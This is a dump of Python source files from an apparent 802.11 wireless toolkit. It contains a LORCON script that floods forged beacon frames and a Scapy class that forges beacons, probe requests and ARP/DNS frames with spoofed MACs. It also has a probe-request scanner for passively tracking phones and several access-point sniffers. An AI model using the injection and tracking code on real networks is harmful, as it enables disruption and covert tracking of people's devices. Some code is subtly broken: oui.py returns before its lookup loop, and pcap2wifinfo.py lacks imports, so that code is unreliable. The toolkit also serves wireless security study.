42 | "\x6d\x65\x74\x68\x69\x6e\x67\x63" \ 43 | "\x6c\x65\x76\x65\x72\x01\x08\x82" \ 44 | "\x84\x8b\x96\x24\x30\x48\x6c\x03" \ 45 | "\x01\x01\x05\x04\x00\x01\x00\x00" \ 46 | "\x2a\x01\x05\x2f\x01\x05\x32\x04" \ 47 | "\x0c\x12\x18\x60\xdd\x05\x00\x10" \ 48 | "\x18\x01\x01\xdd\x16\x00\x50\xf2" \ 49 | "\x01\x01\x00\x00\x50\xf2\x02\x01" \ 50 | "\x00\x00\x50\xf2\x02\x01\x00\x00" \ 51 | "\x50\xf2\x02" 52 | 53 | interface = channel = None 54 | 55 | ''' 56 | This handles all of the command line arguments 57 | ''' 58 | 59 | 60 | try: 61 | opts, args = getopt.getopt(sys.argv[1:], "i:c:h",[]) 62 | except getopt.GetoptError: 63 | usage() 64 | sys.exit(-1) 65 | 66 | for o,a in opts: 67 | if o == "-i": 68 | interface = a 69 | if o == "-c": 70 | channel = string.atoi(a) 71 | if o == "-h": 72 | usage() 73 | 74 | if ( (interface is None) or (channel is None) ): 75 | print "ERROR: Interface or channel not set (see -h for more info)" 76 | sys.exit(-1) 77 | 78 | print "[+] Using interface",interface 79 | 80 | ''' 81 | The following is all of the standard interface, driver, and context setup 82 | ''' 83 | 84 | # Automatically determine the driver of the interface 85 | 86 | try: 87 | driver, description = PyLorcon2.auto_driver(interface) 88 | if driver is not None: 89 | print "[+]\t Driver:",driver 90 | except: 91 | print "[!] Could not determine the driver for",interface 92 | sys.exit(-1) 93 | 94 | # Create LORCON context 95 | try: 96 | ctx = PyLorcon2.Context(interface) 97 | except: 98 | print "[!]\t Failed to create context" 99 | sys.exit(-1) 100 | 101 | # Create Monitor Mode Interface 102 | 103 | try: 104 | ctx.open_injmon() 105 | vap = ctx.get_vap() 106 | if vap is not None: 107 | print "[+]\t Monitor Mode VAP:",vap 108 | except: 109 | print "[!]\t Could not create Monitor Mode interface!" 110 | sys.exit(-1) 111 | 112 | # Set the channel we'll be injecting on 113 | 114 | try: 115 | ctx.set_channel(channel) 116 | print "[+]\t Using channel:",channel,"\n" 117 | except: 118 | print "[!]\t Could not set channel!" 119 | sys.exit(-1) 120 | 121 | ''' 122 | The following is the packet creation and sending code 123 | ''' 124 | 125 | # Keep sending frames until interrupted 126 | count = 0 127 | while 1: 128 | 129 | try: 130 | ctx.send_bytes(packet) 131 | sleep(interval/1000.0) 132 | print "[+] Sent",count,"frames, Hit CTRL + C to stop...\r", 133 | sys.stdout.flush() 134 | 135 | except: 136 | print "\n[!] Exiting..." 137 | sys.exit(0) 138 | 139 | count+=1 140 | 141 | 142 | ''' 143 | The following is all of the standard cleanup stuff 144 | ''' 145 | 146 | # Close the interface 147 | ctx.close() 148 | 149 | 150 | 151 | -------------------------------------------------------------------------------- /misc/lorcon_examples/lorcon.patch: -------------------------------------------------------------------------------- 1 | diff -uNr lorcon2.orig/lorcon_forge.h lorcon2/lorcon_forge.h 2 | --- lorcon2.orig/lorcon_forge.h 2012-09-06 13:56:55.062128418 -0400 3 | +++ lorcon2/lorcon_forge.h 2012-09-06 13:57:05.298179250 -0400 4 | @@ -35,7 +35,7 @@ 5 | 6 | 7 | #ifndef __PACKET_ASSEMBLY_H__ 8 | -#include 9 | +#include 10 | #endif 11 | 12 | /* Create a random MAC address, optionally seeded with a valid wireless OUI 13 | diff -uNr lorcon2.orig/Makefile.in lorcon2/Makefile.in 14 | --- lorcon2.orig/Makefile.in 2012-09-06 13:56:55.066128437 -0400 15 | +++ lorcon2/Makefile.in 2012-09-06 13:57:05.298179250 -0400 16 | @@ -66,6 +66,7 @@ 17 | install -m 644 lorcon_packet.h $(INCLUDE)/lorcon2/lorcon_packet.h 18 | install -m 644 lorcon_packasm.h $(INCLUDE)/lorcon2/lorcon_packasm.h 19 | install -m 644 lorcon_forge.h $(INCLUDE)/lorcon2/lorcon_forge.h 20 | + install -m 644 lorcon_endian.h $(INCLUDE)/lorcon2/lorcon_endian.h 21 | install -m 644 ieee80211.h $(INCLUDE)/lorcon2/lorcon_ieee80211.h 22 | install -d -m 755 $(MAN)/man3 23 | install -o root -m 644 lorcon.3 $(MAN)/man3/lorcon.3 24 | diff -uNr lorcon2.orig/ruby-lorcon/Lorcon2.c lorcon2/ruby-lorcon/Lorcon2.c 25 | --- lorcon2.orig/ruby-lorcon/Lorcon2.c 2012-09-06 13:56:55.062128418 -0400 26 | +++ lorcon2/ruby-lorcon/Lorcon2.c 2012-09-06 14:00:50.563296177 -0400 27 | @@ -127,11 +127,11 @@ 28 | 29 | if (argc == 2) { 30 | rb_scan_args(argc, argv, "2", &rbintf, &rbdriver); 31 | - intf = STR2CSTR(rbintf); 32 | - driver = STR2CSTR(rbdriver); 33 | + intf = StringValuePtr(rbintf); 34 | + driver = StringValuePtr(rbdriver); 35 | } else { 36 | rb_scan_args(argc, argv, "1", &rbintf); 37 | - intf = STR2CSTR(rbintf); 38 | + intf = StringValuePtr(rbintf); 39 | } 40 | 41 | if (driver == NULL) { 42 | -------------------------------------------------------------------------------- /misc/mac.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | # 4 | 5 | __author__ = '090h' 6 | __license__ = 'GPL' 7 | 8 | from oui import OUI 9 | import re 10 | from random import randint 11 | 12 | 13 | class MAC(object): 14 | def __init__(self, address): 15 | self.address = address 16 | if not MAC.is_valid(address): 17 | raise Exception("Invalid MAC Address") 18 | self.mac = address.replace(':', '').replace('-', '') 19 | 20 | @staticmethod 21 | def is_valid(address): 22 | "Return True if it is a valid mac address." 23 | macAddress = re.compile("^((?:[0-9a-fA-F]{2}[:]){5}[0-9a-fA-F]{2})$") 24 | return True if macAddress.match(address) else False 25 | 26 | @staticmethod 27 | def random(): 28 | mac = [0x00, 0x16, 0x3e, 29 | randint(0x00, 0x7f), 30 | randint(0x00, 0xff), 31 | randint(0x00, 0xff)] 32 | return ':'.join(map(lambda x: "%02x" % x, mac)) 33 | 34 | # 35 | @property 36 | def nic(self): 37 | ''' 38 | Parses out the NIC portion of an ASCII MAC address. 39 | 40 | @mac_address - An ASCII string MAC address or NIC, 41 | with or without delimiters. 42 | 43 | Returns the NIC portion of the MAC address as an int. 44 | ''' 45 | # mac = self.mac.replace(':', '').replace('-', '') 46 | mac = self.mac 47 | if len(mac) == 12: 48 | try: 49 | nic = int(mac[6:], 16) 50 | except ValueError as e: 51 | raise Exception("Invalid NIC: [%s]" % mac[6:]) 52 | elif len(mac) == 6: 53 | try: 54 | nic = int(mac, 16) 55 | except ValueError as e: 56 | raise Exception("Invalid NIC: [%s]" % mac) 57 | else: 58 | raise Exception("Invalid MAC address: [%s]" % mac) 59 | 60 | return nic 61 | 62 | @property 63 | def vendor(self): 64 | return OUI().get_vendor(self.address) -------------------------------------------------------------------------------- /misc/oui.py: -------------------------------------------------------------------------------- 1 | import re 2 | 3 | 4 | class OUI(object): 5 | 6 | def __init__(self, db=None): 7 | if db is None: 8 | db = 'oui.txt' 9 | self.db = db 10 | # if not os.path.exists(self.db): 11 | # raise Error 12 | fd = open(db, "r") 13 | self.lines = fd.readlines() 14 | fd.close() 15 | 16 | def get_vendor(self, address): 17 | "Return Vendor string for a MAC address using oui.txt." 18 | unknownVendor = "" 19 | macAddressRegex = "^((?:[0-9a-fA-F]{2}[:-]){5}[0-9a-fA-F]{2})$" 20 | ouiLineRegex = "^\s*((?:[0-9A-F]{2}[-]){2}[0-9A-F]{2})\s+\(hex\)\s+(.*)$" 21 | macAddress = re.compile(macAddressRegex) 22 | ouiLine = re.compile(ouiLineRegex) 23 | if not macAddress.match(address): 24 | raise Exception("Invalid MAC Address") 25 | 26 | address = address.upper() 27 | if address.find(":") != -1: 28 | address = "-".join(address.split(":")[:3]) 29 | else: 30 | address = "-".join(address.split("-")[:3]) 31 | 32 | return unknownVendor 33 | 34 | for line in self.lines: 35 | match = ouiLine.match(line) 36 | if match: 37 | addr, vendor = match.groups() 38 | if address == addr: 39 | return vendor 40 | 41 | return unknownVendor 42 | 43 | 44 | -------------------------------------------------------------------------------- /misc/pcap2wifinfo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | # 4 | 5 | __author__ = '090h' 6 | __license__ = 'GPL' 7 | 8 | from sys import argv, exit 9 | from os import path 10 | f = open('probe.pcap') 11 | pc = dpkt.pcap.Reader(f) 12 | dl=pc.datalink() 13 | if pc.datalink() == 127: #Check if RadioTap 14 | for timestamp, rawdata in pc: 15 | tap = dpkt.radiotap.Radiotap(rawdata) 16 | signal_ssi=-(256-tap.ant_sig.db) #Calculate signal strength 17 | t_len=binascii.hexlify(rawdata[2:3]) #t_len field indicates the entire length of the radiotap data, including the radiotap header. 18 | t_len=int(t_len,16) #Convert to decimal 19 | wlan = dpkt.ieee80211.IEEE80211(rawdata[t_len:]) 20 | if wlan.type == 0 and wlan.subtype == 4: # Indicates a probe request 21 | ssid = wlan.ies[0].info 22 | mac=binascii.hexlify(wlan.mgmt.src) 23 | print "%s, %s (%d dBm)"%(mac,ssid,signal_ssi) -------------------------------------------------------------------------------- /misc/scapy80211.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | 802.11 Scapy Packet Example 5 | Author: Joff Thyer, 2014 6 | """ 7 | 8 | # http://blog.packetheader.net/2014/01/sending-80211-packets-with-scapy.html 9 | # 10 | # if we set logging to ERROR level, it supresses the warning message 11 | # from Scapy about ipv6 routing 12 | # WARNING: No route found for IPv6 destination :: (no default route?) 13 | import logging 14 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 15 | from scapy.all import * 16 | 17 | 18 | class Scapy80211(): 19 | 20 | def __init__(self,intf='wlan0',ssid='test',\ 21 | source='00:00:de:ad:be:ef',\ 22 | bssid='00:11:22:33:44:55',srcip='10.10.10.10'): 23 | 24 | self.rates = "\x03\x12\x96\x18\x24\x30\x48\x60" 25 | 26 | self.ssid = ssid 27 | self.source = source 28 | self.srcip = srcip 29 | self.bssid = bssid 30 | self.intf = intf 31 | self.intfmon = intf + 'mon' 32 | 33 | # set Scapy conf.iface 34 | conf.iface = self.intfmon 35 | 36 | # create monitor interface using iw 37 | cmd = '/sbin/iw dev %s interface add %s type monitor >/dev/null 2>&1' \ 38 | % (self.intf, self.intfmon) 39 | try: 40 | os.system(cmd) 41 | except: 42 | raise 43 | 44 | 45 | def Beacon(self,count=10,ssid='',dst='ff:ff:ff:ff:ff:ff'): 46 | if not ssid: ssid=self.ssid 47 | beacon = Dot11Beacon(cap=0x2104) 48 | essid = Dot11Elt(ID='SSID',info=ssid) 49 | rates = Dot11Elt(ID='Rates',info=self.rates) 50 | dsset = Dot11Elt(ID='DSset',info='\x01') 51 | tim = Dot11Elt(ID='TIM',info='\x00\x01\x00\x00') 52 | pkt = RadioTap()\ 53 | /Dot11(type=0,subtype=8,addr1=dst,addr2=self.source,addr3=self.bssid)\ 54 | /beacon/essid/rates/dsset/tim 55 | 56 | print '[*] 802.11 Beacon: SSID=[%s], count=%d' % (ssid,count) 57 | try: 58 | sendp(pkt,iface=self.intfmon,count=count,inter=0.1,verbose=0) 59 | except: 60 | raise 61 | 62 | 63 | def ProbeReq(self,count=10,ssid='',dst='ff:ff:ff:ff:ff:ff'): 64 | if not ssid: ssid=self.ssid 65 | param = Dot11ProbeReq() 66 | essid = Dot11Elt(ID='SSID',info=ssid) 67 | rates = Dot11Elt(ID='Rates',info=self.rates) 68 | dsset = Dot11Elt(ID='DSset',info='\x01') 69 | pkt = RadioTap()\ 70 | /Dot11(type=0,subtype=4,addr1=dst,addr2=self.source,addr3=self.bssid)\ 71 | /param/essid/rates/dsset 72 | 73 | print '[*] 802.11 Probe Request: SSID=[%s], count=%d' % (ssid,count) 74 | try: 75 | sendp(pkt,count=count,inter=0.1,verbose=0) 76 | except: 77 | raise 78 | 79 | 80 | 81 | def ARP(self,targetip,count=1,toDS=False): 82 | if not targetip: return 83 | 84 | arp = LLC()/SNAP()/ARP(op='who-has',psrc=self.srcip,pdst=targetip,hwsrc=self.source) 85 | if toDS: 86 | pkt = RadioTap()\ 87 | /Dot11(type=2,subtype=32,FCfield='to-DS',\ 88 | addr1=self.bssid,addr2=self.source,addr3='ff:ff:ff:ff:ff:ff')\ 89 | /arp 90 | else: 91 | pkt = RadioTap()\ 92 | /Dot11(type=2,subtype=32,\ 93 | addr1='ff:ff:ff:ff:ff:ff',addr2=self.source,addr3=self.bssid)\ 94 | /arp 95 | 96 | print '[*] ARP Req: who-has %s' % (targetip) 97 | try: 98 | sendp(pkt,inter=0.1,verbose=0,count=count) 99 | except: 100 | raise 101 | 102 | ans = sniff(lfilter = lambda x: x.haslayer(ARP) and x.op == 2, 103 | store=1,count=1,timeout=1) 104 | 105 | if len(ans) > 0: 106 | return ans[0][ARP].hwsrc 107 | else: 108 | return None 109 | 110 | 111 | def DNSQuery(self,query='www.google.com',qtype='A',ns=None,count=1,toDS=False): 112 | if ns == None: return 113 | dstmac = self.ARP(ns) 114 | 115 | dns = LLC()/SNAP()/IP(src=self.srcip,dst=ns)/\ 116 | UDP(sport=random.randint(49152,65535),dport=53)/\ 117 | DNS(qd=DNSQR(qname=query,qtype=qtype)) 118 | 119 | if toDS: 120 | pkt = RadioTap()\ 121 | /Dot11(type=2,subtype=32,FCfield='to-DS',\ 122 | addr1=self.bssid,addr2=self.source,addr3=dstmac)/dns 123 | else: 124 | pkt = RadioTap()\ 125 | /Dot11(type=2,subtype=32,\ 126 | addr1=dstmac,addr2=self.source,addr3=self.bssid)/dns 127 | 128 | print '[*] DNS query %s (%s) -> %s?' % (query,qtype,ns) 129 | try: 130 | sendp(pkt,count=count,verbose=0) 131 | except: 132 | raise 133 | 134 | # main routine 135 | if __name__ == "__main__": 136 | print """ 137 | [*] 802.11 Scapy Packet Crafting Example 138 | [*] Assumes 'wlan0' is your wireless NIC! 139 | [*] Author: Joff Thyer, 2014 140 | """ 141 | sdot11 = Scapy80211(intf='wlan0') 142 | sdot11.Beacon() 143 | sdot11.ProbeReq() 144 | sdot11.DNSQuery(ns='10.10.10.2') -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | # 802.11 environment requirements 2 | # use "pip install -r requirements.txt" to install 3 | 4 | PyLorcon2 5 | PyYAML==5.4 6 | argh==0.26.1 7 | colorama==0.3.3 8 | colorclass==1.2.0 9 | dnet==1.12 10 | docopt==0.6.2 11 | dpkt==1.8.6 12 | impacket==0.9.12 13 | iwlib==1.5 14 | libnl==0.2.0 15 | netaddr==0.7.14 16 | netlink==1.0 17 | pathtools==0.1.2 18 | pbkdf2==1.3 19 | pcapy==0.10.8 20 | prettytable==0.7.2 21 | -e git+https://github.com/arend/py80211@4f6ef735d96bddc24a0090af8876bb20a84fb3ff#egg=py80211-master 22 | pycparser==2.10 23 | pyroute2==0.3.6 24 | python-wifi==0.6.0 25 | -e git+https://github.com/pingflood/pythonwifi.git@2d20c4f0d057833d5b851280ed2133b0b82bf69c#egg=python_wifi-master 26 | scapy==2.4.1 27 | terminaltables==1.1.1 28 | watchdog==0.8.3 29 | wireless==0.3.0 30 | wireless-radar==0.2.1 31 | wifi==0.3.4 32 | 33 | -------------------------------------------------------------------------------- /scan/README.md: -------------------------------------------------------------------------------- 1 | ### WiFi Scan 2 | 3 | This short python script scans for probe requests from whitelisted WiFi clients. It is meant for demonstration purposes, alongside my article on WiFi tracking: 4 | [http://edwardkeeble.com/2014/02/passive-wifi-tracking/](http://edwardkeeble.com/2014/02/passive-wifi-tracking/). -------------------------------------------------------------------------------- /scan/wifiscan.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | PROBE_REQUEST_TYPE=0 4 | PROBE_REQUEST_SUBTYPE=4 5 | 6 | WHITELIST = ['00:00:00:00:00:00',] # Replace this with your phone's MAC address 7 | 8 | 9 | def PacketHandler(pkt): 10 | if pkt.haslayer(Dot11): 11 | if pkt.type==PROBE_REQUEST_TYPE and pkt.subtype == PROBE_REQUEST_SUBTYPE and ( pkt.addr2.lower() in WHITELIST or pkt.addr2.upper() in WHITELIST): 12 | PrintPacket(pkt) 13 | 14 | def PrintPacket(pkt): 15 | print "Probe Request Captured:" 16 | try: 17 | extra = pkt.notdecoded 18 | except: 19 | extra = None 20 | if extra!=None: 21 | signal_strength = -(256-ord(extra[-4:-3])) 22 | else: 23 | signal_strength = -100 24 | print "No signal strength found" 25 | print "Target: %s Source: %s SSID: %s RSSi: %d"%(pkt.addr3,pkt.addr2,pkt.getlayer(Dot11ProbeReq).info,signal_strength) 26 | 27 | def main(): 28 | from datetime import datetime 29 | print "[%s] Starting scan"%datetime.now() 30 | print "Scanning for:" 31 | print "\n".join(mac for mac in WHITELIST) 32 | sniff(iface=sys.argv[1],prn=PacketHandler) 33 | 34 | if __name__=="__main__": 35 | main() 36 | -------------------------------------------------------------------------------- /sniff/airoscapy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # airoscapy.py - Wireless AP scanner based on scapy 3 | # version: 0.2 4 | # Author: iphelix 5 | import sys, os, signal 6 | from multiprocessing import Process 7 | 8 | from scapy.all import * 9 | 10 | interface='' # monitor interface 11 | aps = {} # dictionary to store unique APs 12 | 13 | # process unique sniffed Beacons and ProbeResponses. 14 | def sniffAP(p): 15 | if ( (p.haslayer(Dot11Beacon) or p.haslayer(Dot11ProbeResp)) 16 | and not aps.has_key(p[Dot11].addr3)): 17 | ssid = p[Dot11Elt].info 18 | bssid = p[Dot11].addr3 19 | channel = int( ord(p[Dot11Elt:3].info)) 20 | capability = p.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}\ 21 | {Dot11ProbeResp:%Dot11ProbeResp.cap%}") 22 | 23 | # Check for encrypted networks 24 | if re.search("privacy", capability): enc = 'Y' 25 | else: enc = 'N' 26 | 27 | # Save discovered AP 28 | aps[p[Dot11].addr3] = enc 29 | 30 | # Display discovered AP 31 | print "%02d %s %s %s" % (int(channel), enc, bssid, ssid) 32 | 33 | # Channel hopper 34 | def channel_hopper(): 35 | while True: 36 | try: 37 | channel = random.randrange(1,15) 38 | os.system("iw dev %s set channel %d" % (interface, channel)) 39 | time.sleep(1) 40 | except KeyboardInterrupt: 41 | break 42 | 43 | # Capture interrupt signal and cleanup before exiting 44 | def signal_handler(signal, frame): 45 | p.terminate() 46 | p.join() 47 | 48 | print "\n-=-=-=-=-= STATISTICS =-=-=-=-=-=-" 49 | print "Total APs found: %d" % len(aps) 50 | print "Encrypted APs : %d" % len([ap for ap in aps if aps[ap] =='Y']) 51 | print "Unencrypted APs: %d" % len([ap for ap in aps if aps[ap] =='N']) 52 | 53 | sys.exit(0) 54 | 55 | if __name__ == "__main__": 56 | if len(sys.argv) != 2: 57 | print "Usage %s monitor_interface" % sys.argv[0] 58 | sys.exit(1) 59 | 60 | interface = sys.argv[1] 61 | 62 | # Print the program header 63 | print "-=-=-=-=-=-= AIROSCAPY =-=-=-=-=-=-" 64 | print "CH ENC BSSID SSID" 65 | 66 | # Start the channel hopper 67 | p = Process(target = channel_hopper) 68 | p.start() 69 | 70 | # Capture CTRL-C 71 | signal.signal(signal.SIGINT, signal_handler) 72 | 73 | # Start the sniffer 74 | sniff(iface=interface,prn=sniffAP) 75 | -------------------------------------------------------------------------------- /sniff/dummy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # Dummy 802.11 sniffer 4 | 5 | from sys import argv 6 | import logging 7 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 8 | from scapy.all import * 9 | from scapy.layers.dot11 import Dot11, Dot11Beacon 10 | conf.verb = 0 11 | 12 | 13 | def sniff_dummy(iface): 14 | ap_list = [] 15 | 16 | def handler(pkt): 17 | if pkt.haslayer(Dot11) and pkt.haslayer(Dot11Beacon): 18 | if pkt.addr2 not in ap_list: 19 | ap_list.append(pkt.addr2) 20 | print("AP MAC: %s with SSID: %s " % (pkt.addr2, pkt.info)) 21 | 22 | sniff(iface=iface, prn=handler) 23 | 24 | 25 | if __name__ == '__main__': 26 | sniff_dummy(argv[1]) 27 | -------------------------------------------------------------------------------- /sniff/iSniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Tiny WiFi sniffer for Apple AirPort card. 3 | # Based on https://gist.githubusercontent.com/nevdull77/10605115/raw/a2c10a3fee579b1e64404ac1266ca24589e4d3f5/sniff.py 4 | # http://www.cqure.net/wp/2014/04/scapy-with-wifi-monitor-rfmon-mode-on-os-x/#more-553 5 | # This insight was included in airoscapy.py (http://www.thesprawl.org/projects/airoscapy/) 6 | 7 | from scapy.all import * 8 | from scapy.layers.dot11 import * 9 | from datetime import datetime 10 | from time import time 11 | from pprint import pprint 12 | from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter 13 | 14 | __author__ = '090h' 15 | __license__ = 'GPL' 16 | 17 | PROBE_REQUEST_TYPE = 0 18 | PROBE_REQUEST_SUBTYPE = 4 19 | 20 | class iSniffer(object): 21 | 22 | 23 | def __init__(self, iface='en1', whitelist=None, verbose=False): 24 | # Replace this with your phone's MAC address 25 | if not whitelist: whitelist = ['00:00:00:00:00:00', ] 26 | self.iface = iface 27 | self.whitelist = whitelist 28 | self.verbose = verbose 29 | self.aps = {} 30 | self.clients = {} 31 | 32 | # Probe requests from clients 33 | def handle_probe(self, pkt): 34 | if pkt.haslayer(Dot11ProbeReq) and '\x00' not in pkt[Dot11ProbeReq].info: 35 | essid = pkt[Dot11ProbeReq].info 36 | else: 37 | essid = 'Hidden SSID' 38 | client = pkt[Dot11].addr2 39 | 40 | if client in self.whitelist or essid in self.whitelist: 41 | #TODO: add logging 42 | return 43 | 44 | # New client 45 | if client not in self.clients: 46 | self.clients[client] = [] 47 | print('[!] New client: %s ' % client) 48 | 49 | if essid not in self.clients[client]: 50 | self.clients[client].append(essid) 51 | print('[+] New ProbeRequest: from %s to %s' % (client, essid)) 52 | 53 | def handle_beacon(self, pkt): 54 | if not pkt.haslayer(Dot11Elt): 55 | return 56 | 57 | # Check to see if it's a hidden SSID 58 | essid = pkt[Dot11Elt].info if '\x00' not in pkt[Dot11Elt].info and pkt[Dot11Elt].info != '' else 'Hidden SSID' 59 | bssid = pkt[Dot11].addr3 60 | client = pkt[Dot11].addr2 61 | 62 | if client in self.whitelist or essid in self.whitelist or bssid in self.whitelist: 63 | #TODO: add logging 64 | return 65 | 66 | try: 67 | channel = int(ord(pkt[Dot11Elt:3].info)) 68 | except: 69 | channel = 0 70 | 71 | try: 72 | extra = pkt.notdecoded 73 | rssi = -(256-ord(extra[-4:-3])) 74 | except: 75 | rssi = -100 76 | #print "No signal strength found" 77 | 78 | p = pkt[Dot11Elt] 79 | 80 | capability = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}" 81 | "{Dot11ProbeResp:%Dot11ProbeResp.cap%}").split('+') 82 | # print('capability = %s' % capability) 83 | 84 | crypto = set() 85 | while isinstance(p, Dot11Elt): 86 | if p.ID == 48: 87 | crypto.add("WPA2") 88 | elif p.ID == 221 and p.info.startswith('\x00P\xf2\x01\x01\x00'): 89 | crypto.add("WPA") 90 | p = p.payload 91 | 92 | if not crypto: 93 | if 'privacy' in capability: 94 | crypto.add("WEP") 95 | else: 96 | crypto.add("OPN") 97 | 98 | # print "NEW AP: %r [%s], channed %d, %s" % (ssid, bssid, channel,' / '.join(crypto)) 99 | # print "Target: %s Source: %s SSID: %s RSSi: %d" % (pkt.addr3, pkt.addr2, pkt.getlayer(Dot11ProbeReq).info, rssi) 100 | enc = '/'.join(crypto) 101 | if bssid not in self.aps: 102 | self.aps[bssid] = (channel, essid, bssid, enc, rssi) 103 | print "[+] New AP {0:5}\t{1:20}\t{2:20}\t{3:5}\t{4:4}".format(channel, essid, bssid, enc, rssi) 104 | 105 | 106 | def pkt_handler(self, pkt): 107 | # wlan.fc.type == 0 Management frames 108 | # wlan.fc.type == 1 Control frames 109 | # wlan.fc.type == 2 Data frames 110 | # wlan.fc.type_subtype == 0 Association request 111 | # wlan.fc.type_subtype == 1 Association response 112 | # wlan.fc.type_subtype == 2 Reassociation request 113 | # wlan.fc.type_subtype == 3 Reassociation response 114 | # wlan.fc.type_subtype == 4 Probe request 115 | # wlan.fc.type_subtype == 5 Probe response 116 | # wlan.fc.type_subtype == 8 Beacon 117 | # 118 | # if pkt.type == 0 and pkt.subtype == 8: 119 | # if '\x00' in pkt.info: 120 | # essid = '' 121 | # else: 122 | # essid = pkt.info 123 | # print "AP MAC: %s with SSID: %s " % (pkt.addr2, essid) 124 | # 125 | # if pkt.type == 0 and pkt.subtype == 4: 126 | # self.handle_probe(pkt) 127 | # 128 | # return 129 | #if pkt.addr2 not in ap_list : 130 | #ap_list.append(pkt.addr2) 131 | #print "AP MAC: %s with SSID: %s " % (pkt.addr2, pkt.info) 132 | #print('Type: %i Subtype: %i' % (pkt.type, pkt.subtype)) 133 | # print(pkt.summary) 134 | # return 135 | 136 | # Client ProbeReq 137 | # if pkt.haslayer(Dot11ProbeReq): 138 | if pkt.type == PROBE_REQUEST_TYPE and pkt.subtype == PROBE_REQUEST_SUBTYPE: 139 | self.handle_probe(pkt) 140 | 141 | # AP beacon or response 142 | if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp): 143 | self.handle_beacon(pkt) 144 | 145 | def sniff(self, count=0): 146 | ''' 147 | Sniff Beacon and Probe Requst/Response frames to extract AP info 148 | :param count: packets to capture, 0 = loop 149 | :return: 150 | ''' 151 | print('Press Ctrl-C to stop sniffing.') 152 | sniff(iface=self.iface, 153 | prn=self.pkt_handler, 154 | # lfilter=lambda p: p.haslayer(Dot11)) 155 | lfilter=lambda p: p.haslayer(Dot11Beacon) or p.haslayer(Dot11ProbeResp) or p.haslayer(Dot11ProbeReq)) 156 | 157 | def stat(self): 158 | # Print results 159 | print('\nAP list:') 160 | pprint(self.aps) 161 | print('Clients:') 162 | pprint(self.clients) 163 | 164 | 165 | # make_table(lambda l:"%%-%is" % l, lambda l:"%%-%is" % l, "", *args, **kargs) 166 | #make_table(self.ap.items(), lambda l: str(l)) 167 | # lambda l: ",".join(['"%s"' % x for x in [self.ap[l]['ssid'], self.ap[l]['cli'], self.ap[l]['lastseen']]])) 168 | # print(",".join(["ssid", "cli", "lastseen"])) 169 | # for key in self.ap: 170 | # print(",".join(['"%s"' % x for x in [self.ap[key]['ssid'], self.ap[key]['cli'], self.ap[key]['lastseen']]])) 171 | 172 | 173 | if __name__ == '__main__': 174 | parser = ArgumentParser('iSniff', description='Tiny iSniff for RFMON under OS X', 175 | formatter_class=ArgumentDefaultsHelpFormatter) 176 | parser.add_argument('-i', '--interface', default='en1', required=False, help='Interface to used') 177 | args = parser.parse_args() 178 | 179 | isniff = iSniffer(args.interface) 180 | isniff.sniff() 181 | isniff.stat() 182 | -------------------------------------------------------------------------------- /sniff/oneline.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | # 4 | 5 | __author__ = '090h' 6 | __license__ = 'GPL' 7 | 8 | from sys import argv, exit 9 | from os import path 10 | from scapy.all import * 11 | 12 | sniff('en1', prn=lambda x: hexdump(x)) 13 | sniff("en1", prn=lambda x: x.summary()) 14 | 15 | 16 | 17 | sniff('en1', lfilter=lambda x: x.haslayer(Dot11ProbeReq), prn=lambda x: hexdump(x)) 18 | sniff('en1', lfilter=lambda x: x.haslayer(Dot11ProbeReq), prn=lambda x: x.info) 19 | sniff('en1', lfilter=lambda x: x.haslayer(Dot11ProbeReq), prn=lambda x: (x.addr1, x.addr2, x.addr3,x.info)) 20 | sniff('en1', lfilter=lambda x: x.haslayer(Dot11ProbeReq), prn=lambda x: ( x.addr2, x.info)) 21 | sniff('en1', lfilter=lambda x: x.haslayer(Dot11ProbeReq), prn=lambda x: ( x.addr2, x.info, x.Rate)) 22 | 23 | sniff('en1', lfilter=lambda x: x.haslayer(Dot11Beacon), prn=lambda x: hexdump(x)) 24 | sniff('en1', lfilter=lambda x: x.haslayer(Dot11Beacon) , prn=lambda x: x.info) 25 | sniff('en1', lfilter=lambda x: x.haslayer(Dot11Beacon) , prn=lambda p: p.info, store=0) 26 | 27 | set(map(lambda x: (x.addr2,x.info),sniff('en1', timeout=3, lfilter=lambda x: x.haslayer(Dot11Beacon)))) 28 | set(map(lambda x: (x.addr2,x.info),sniff('en1', timeout=3, lfilter=lambda x: x.haslayer(Dot11Beacon)))) 29 | set(filter(lambda x: '\x00' not in x[1], map(lambda x: (x.addr2,x.info),sniff('en1', timeout=3, lfilter=lambda x: x.haslayer(Dot11Beacon))))) 30 | 31 | sniff('en1', lfilter=lambda x: x.haslayer(Dot11Beacon), prn=lambda x: ls(x)) 32 | 33 | 34 | sniff('en1', lfilter=lambda x: x.haslayer(Dot11Beacon)).make_table( lambda x: (x.addr2, x.info) ) 35 | sniff("en1", prn=lambda x:x.sprintf("{Dot11Beacon:%Dot11.addr3%\t%Dot11Beacon.info%\t%PrismHeader.channel%\tDot11Beacon.cap%}")) 36 | sniff("en1",lfilter=lambda x: x.haslayer(Dot11Beacon), prn=lambda x: x[Dot11Beacon].cap) -------------------------------------------------------------------------------- /sniff/rawsock.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # -*- coding: utf-8 -*- 3 | # Linux raw socket 802.11 sniffer 4 | # Usage: 5 | # sudo ./rawsock.py mon0 6 | 7 | import socket 8 | import sys 9 | 10 | def sniff_raw_socket(iface): 11 | rawSocket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003)) 12 | rawSocket.bind((iface, 0x0003)) 13 | ap_list = set() 14 